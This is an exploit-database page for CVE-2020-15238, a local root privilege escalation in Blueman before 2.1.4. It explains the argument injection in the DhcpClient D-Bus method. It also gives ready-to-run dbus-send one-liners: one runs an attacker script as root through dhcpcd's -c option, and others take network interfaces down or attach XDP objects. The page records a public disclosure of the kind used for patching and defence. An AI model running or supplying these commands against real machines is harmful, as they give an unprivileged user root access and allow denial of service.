Blueman Local Root / Privilege Escalation

2020.10.29
Risk: High
Local: Yes
Remote: No
CWE: CWE-264

# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4 # Date: 2020-10-27 # Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl) # Vendor Homepage: https://github.com/blueman-project/blueman # Software Link: https://github.com/blueman-project/blueman # Version: < 2.1.4 # Tested on: Ubuntu 20.04 # CVE: CVE-2020-15238 # # By default installed on Ubuntu 16.04 - 20.10 and # Debian 9 - 11 # # Local root exploit when dhcpcd is used instead of dhclient # # Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html # # # The DhcpClient method of the d-bus interface to blueman-mechanism # is prone to an argument injection vulnerability. # On systems where the isc-dhcp-client package is removed # and the dhcpcd package installed, this leads to Local # Privilege Escalation to root from any unprivileged user. # See attached python script for a working exploit. Or use # this oneliner with a shellscript "/tmp/eye": dbus-send --print-reply --system --dest=org.blueman.Mechanism \ /org/blueman/mechanism org.blueman.Mechanism.DhcpClient \ string:"-c/tmp/eye" # This happens because the argument is not sanitized before # being used as an argument to dhcpcd. # # Also on default installations with isc-dhcp-client installed, # this can lead to DoS attacks by bringing any interface down # as follows: dbus-send --print-reply --system --dest=org.blueman.Mechanism \ /org/blueman/mechanism org.blueman.Mechanism.DhcpClient \ string:"ens33 down al" # Or allows users to attach XDP objects to an interface: dbus-send --print-reply --system --dest=org.blueman.Mechanism \ /org/blueman/mechanism org.blueman.Mechanism.DhcpClient \ string:"ens33 down al" dbus-send --print-reply --system --dest=org.blueman.Mechanism \ /org/blueman/mechanism org.blueman.Mechanism.DhcpClient \ string:"ens33 name a" dbus-send --print-reply --system --dest=org.blueman.Mechanism \ /org/blueman/mechanism org.blueman.Mechanism.DhcpClient \ string:"a xdp o /tmp/o" # This both happens because the argument is passed to "ip link" # unsanitized.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top